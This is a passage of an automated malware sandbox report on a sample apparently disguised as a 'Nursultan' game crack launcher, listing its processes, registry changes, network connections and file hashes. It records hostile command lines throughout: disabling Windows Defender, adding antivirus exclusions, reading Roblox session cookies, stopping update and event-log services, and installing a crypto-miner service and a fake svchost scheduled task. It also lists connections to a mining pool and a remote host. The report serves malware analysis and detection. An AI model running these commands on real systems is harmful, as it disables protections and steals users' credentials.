| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\ = "URL:Run game 1199748644409184347 protocol" | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\URL Protocol | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open\command | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347 | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe" | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe" | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe
"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "XMRKNZQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "XMRKNZQC"
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mine.bmpool.org | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | 30.178.252.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | unknown-sunglasses.gl.at.ply.gg | udp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
Files
memory/2128-0-0x00007FF8AFBD3000-0x00007FF8AFBD5000-memory.dmp
memory/2128-1-0x0000000000480000-0x0000000000780000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1mrhdqp.xif.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/464-11-0x0000022CEAD90000-0x0000022CEADB2000-memory.dmp
memory/464-12-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp
memory/464-13-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp
memory/464-14-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp
memory/464-17-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp
memory/2128-18-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
| MD5 | a1d8db2a1ff742bc73dd5617083f5fde |
| SHA1 | 957b182d82efb40a36099dd886ad581977880838 |
| SHA256 | d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a |
| SHA512 | 0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
| MD5 | f0b33cc162bfd36a995b8c90cd8ebff1 |
| SHA1 | ca1ddef08d47fc15a44a2d651b61e3decce8ebc6 |
| SHA256 | 6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0 |
| SHA512 | 1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0 |
memory/4584-50-0x000001A8B4AC0000-0x000001A8B4B00000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fa8d1461e4feb2c39654e3a555a027f8 |
| SHA1 | 0ca46b8961ceba8f9da31de5ed2408643fc89141 |
| SHA256 | 7e26e4f0ef3a7d2904818a691429789c4781029ff4aab697c3b7c9a4287d661f |
| SHA512 | e486b8f029c7eec60b6b2b5603390330afb1ddf627cc01c511808c47e68676b4c429b9f75fd4e16e48b496dccfe8cc8ec4a35825e1e889e66571acb6c03e0869 |
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
| MD5 | 0df0a039309525fd27e1b5e056c92b6a |
| SHA1 | 7551c27a9123cb56c4218647966a753794ac2961 |
| SHA256 | a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f |
| SHA512 | 2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6 |
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
| MD5 | c137c5f5287d73a94d55bc18df238303 |
| SHA1 | 95b4b01775bea14feaaa462c98d969eb81696d2c |
| SHA256 | d294856177658df0159cfe937e5ea95a8ee8a2ca85754d897aea3bb5d0d962c0 |
| SHA512 | ba595d185ae98152658ce95964fd6bcce7e970896b0b1c674a142d126cf0433094debcd25527d9b4f5a6568cc5a8a42aeaef536166748eea3973f8b694564aa5 |
memory/2128-82-0x00007FF8AFBD0000-0x00007FF8B0691000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ef72c47dbfaae0b9b0d09f22ad4afe20 |
| SHA1 | 5357f66ba69b89440b99d4273b74221670129338 |
| SHA256 | 692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f |
| SHA512 | 7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4 |
memory/4244-94-0x0000000000940000-0x0000000000B28000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 65a68df1062af34622552c4f644a5708 |
| SHA1 | 6f6ecf7b4b635abb0b132d95dac2759dc14b50af |
| SHA256 | 718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35 |
| SHA512 | 4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d |
memory/4584-108-0x000001A8CF230000-0x000001A8CF2A6000-memory.dmp
memory/4584-109-0x000001A8CF2B0000-0x000001A8CF300000-memory.dmp
memory/4584-110-0x000001A8B6750000-0x000001A8B676E000-memory.dmp
memory/4244-111-0x00000000054D0000-0x000000000556C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 07d142044fb78e359c794180a9c6fdff |
| SHA1 | 8a7155f93a53ff1b7f382a4ccb3f58ff2f88808e |
| SHA256 | 2af8c3ca529953085ca25f69d9142964e2ce5508665c14f3533a47d254fed3ea |
| SHA512 | 356edd3598c09b765c3de325bc47c5c8ae7fcfd87e8c58e12e8bb6437f1d7ce58310e06c4d64336815833e280f2e61c288edb09508c4f29876d28b0d602aeb78 |
memory/4244-135-0x00000000061C0000-0x0000000006764000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 88be3bc8a7f90e3953298c0fdbec4d72 |
| SHA1 | f4969784ad421cc80ef45608727aacd0f6bf2e4b |
| SHA256 | 533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a |
| SHA512 | 4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c |
memory/4244-147-0x0000000005C90000-0x0000000005D46000-memory.dmp
memory/1248-148-0x0000000000400000-0x0000000000412000-memory.dmp
memory/4584-153-0x000001A8B6790000-0x000001A8B679A000-memory.dmp
memory/4584-154-0x000001A8B67C0000-0x000001A8B67D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 75f5f6d1505c3d09f147fec53238c2c0 |
| SHA1 | 508feb25bce53e5e3ac0b4ed70c1992e329bf07b |
| SHA256 | 464fbbbdf5db7ad5b4341e6f1fd33d4db12534e3df2769fc5efc51b4e0b47b33 |
| SHA512 | f5cc3a6b86c22994b5e7e01803e037b1ed4c7b48698b6b29087b5e5042c9cdb3697c3dc58e261f7bd9200b0133da7601aee21643b09a152553c1d05c51424461 |
memory/3616-170-0x0000000004E20000-0x0000000004E56000-memory.dmp
memory/3616-171-0x00000000054C0000-0x0000000005AE8000-memory.dmp
memory/3616-176-0x0000000005410000-0x0000000005432000-memory.dmp
memory/3616-177-0x0000000005BF0000-0x0000000005C56000-memory.dmp
memory/3616-178-0x0000000005D50000-0x0000000005DB6000-memory.dmp
memory/3616-188-0x0000000005EC0000-0x0000000006214000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 894afb4ff3cd7ee1f69400e936f8fc9d |
| SHA1 | aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51 |
| SHA256 | 20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9 |
| SHA512 | 449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98 |
memory/3616-200-0x0000000006410000-0x000000000645C000-memory.dmp
memory/3616-199-0x00000000063C0000-0x00000000063DE000-memory.dmp
memory/3616-215-0x0000000070890000-0x00000000708DC000-memory.dmp
memory/3616-214-0x0000000006980000-0x00000000069B2000-memory.dmp
memory/3616-225-0x00000000069C0000-0x00000000069DE000-memory.dmp
memory/3616-226-0x00000000075F0000-0x0000000007693000-memory.dmp
memory/2944-236-0x00000196FE090000-0x00000196FE0AC000-memory.dmp
memory/2944-237-0x00000196FE0B0000-0x00000196FE165000-memory.dmp
memory/3616-238-0x0000000007D30000-0x00000000083AA000-memory.dmp
memory/2944-239-0x00000196FE080000-0x00000196FE08A000-memory.dmp
memory/3616-240-0x00000000076F0000-0x000000000770A000-memory.dmp
memory/3616-241-0x0000000007760000-0x000000000776A000-memory.dmp
memory/2944-242-0x00000196FE2D0000-0x00000196FE2EC000-memory.dmp
memory/3616-243-0x0000000007960000-0x00000000079F6000-memory.dmp
memory/3616-244-0x0000000007920000-0x0000000007931000-memory.dmp
memory/2944-245-0x00000196FE2B0000-0x00000196FE2BA000-memory.dmp
memory/2944-246-0x00000196FE310000-0x00000196FE32A000-memory.dmp
memory/2944-247-0x00000196FE2C0000-0x00000196FE2C8000-memory.dmp
memory/2944-248-0x00000196FE2F0000-0x00000196FE2F6000-memory.dmp
memory/2944-249-0x00000196FE300000-0x00000196FE30A000-memory.dmp
memory/3616-252-0x0000000007940000-0x000000000794E000-memory.dmp
memory/3616-253-0x0000000007A00000-0x0000000007A14000-memory.dmp
memory/3616-254-0x0000000007A50000-0x0000000007A6A000-memory.dmp
memory/4600-259-0x0000000140000000-0x000000014000E000-memory.dmp
memory/4600-258-0x0000000140000000-0x000000014000E000-memory.dmp
memory/812-264-0x0000000140000000-0x0000000140848000-memory.dmp
memory/812-268-0x0000000140000000-0x0000000140848000-memory.dmp
memory/812-270-0x000001B194D50000-0x000001B194D70000-memory.dmp
memory/812-272-0x0000000140000000-0x0000000140848000-memory.dmp
memory/3616-271-0x0000000007A30000-0x0000000007A38000-memory.dmp
memory/812-273-0x0000000140000000-0x0000000140848000-memory.dmp
memory/812-276-0x0000000140000000-0x0000000140848000-memory.dmp
memory/812-275-0x0000000140000000-0x0000000140848000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b1964f71ab2b69655a2994782b875132 |
| SHA1 | 0e548645cab1dda0c3d5d528393a08ce0b6fe6a5 |
| SHA256 | b9cef8300f65c804798ca1f4437408825d29f80429412a5bb8664284953b18f4 |
